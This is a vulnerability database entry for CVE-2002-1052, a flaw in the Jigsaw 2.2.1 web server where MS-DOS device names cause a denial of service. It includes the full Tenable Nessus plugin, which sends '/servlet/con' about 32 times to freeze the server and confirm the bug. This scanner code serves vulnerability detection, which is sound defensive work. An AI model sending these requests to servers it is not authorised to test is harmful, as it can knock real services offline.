Vulnerabilities > CVE-2002-1052 - Unspecified vulnerability in W3C Jigsaw 2.2.1

047910
CVSS 0.0 - NONE
Attack vector
UNKNOWN
Attack complexity
UNKNOWN
Privileges required
UNKNOWN
Confidentiality impact
UNKNOWN
Integrity impact
UNKNOWN
Availability impact
UNKNOWN
w3c
nessus

Summary

Jigsaw 2.2.1 on Windows systems allows remote attackers to use MS-DOS device names in HTTP requests to (1) cause a denial of service using the "con" device, or (2) obtain the physical path of the server using two requests to the "aux" device.

Vulnerable Configurations

Part Description Count
Application
W3C
1

Nessus

NASL familyWeb Servers
NASL idJIGSAW_MSDOS_DEV_DOS.NASL
descriptionThe version of Jigsaw web server running on the remote host has a denial of service vulnerability. It was possible to exhaust all of the web server
last seen2020-06-01
modified2020-06-02
plugin id11047
published2002-07-17
reporterThis script is Copyright (C) 2002-2018 Tenable Network Security, Inc.
sourcehttps://www.tenable.com/plugins/nessus/11047
titleJigsaw Webserver MS/DOS Device Request Remote DoS
code
#
# (C) Tenable Network Security, Inc.
#

# Script audit and contributions from Carmichael Security 
#      Erik Anderson <[email protected]> (nb: this domain no longer exists)
#      Added BugtraqID and CAN
#


include("compat.inc");


if(description)
{
 script_id(11047);
 script_version("1.26");
 script_cve_id("CVE-2002-1052");
 script_bugtraq_id(5258);

 script_name(english:"Jigsaw Webserver MS/DOS Device Request Remote DoS");
 script_summary(english:"Jigsaw DOS dev DoS");
 
  script_set_attribute(
   attribute:"synopsis",
   value:"The remote web server has a denial of service vulnerability."
 );
 script_set_attribute( attribute:"description",  value:
"The version of Jigsaw web server running on the remote host has a
denial of service vulnerability.  It was possible to exhaust all of
the web server's available threads by requesting '/servlet/con' about
thirty times.  A remote attacker could exploit this to repeatedly
freeze the web server." );
 script_set_attribute(
   attribute:"see_also",
   value:"https://seclists.org/bugtraq/2002/Jul/191"
 );
 script_set_attribute(
   attribute:"solution", 
   value:"Upgrade to the latest version of this software."
 );
 script_set_cvss_base_vector("CVSS2#AV:N/AC:L/Au:N/C:N/I:N/A:P");
 script_set_cvss_temporal_vector("CVSS2#E:U/RL:OF/RC:C");
 script_set_attribute(attribute:"exploitability_ease", value:"No known exploits are available");
 script_set_attribute(attribute:"exploit_available", value:"false");
 script_set_attribute(attribute:"plugin_publication_date", value: "2002/07/17");
 script_set_attribute(attribute:"vuln_publication_date", value: "2002/07/17");
 script_cvs_date("Date: 2018/11/15 20:50:25");
 script_set_attribute(attribute:"plugin_type", value:"remote");
 script_end_attributes();
 
 script_category(ACT_DENIAL);
 script_family(english:"Web Servers");

 script_copyright(english:"This script is Copyright (C) 2002-2018 Tenable Network Security, Inc.");

 script_dependencie("find_service1.nasl", "os_fingerprint.nasl");
 script_require_ports("Services/www", 80);

 exit(0);
}


include("global_settings.inc");
include("misc_func.inc");
include("http.inc");


os = get_kb_item("Host/OS");
if ( ! os || "Windows" >!< os ) exit(0);

port = get_http_port(default:80);
if (http_is_dead(port: port)) exit(0);
banner = get_http_banner(port:port);
if (! banner || "Jigsaw" >!< banner ) exit(0);


url = '/servlet/con';

for (i=0; i<32;i=i+1)
{
 res = http_send_recv3(method:"GET", item:url, port:port);

 if (isnull(res))
 {
   security_warning(port);
   exit(0);
 }
}

if(http_is_dead(port:port))security_warning(port);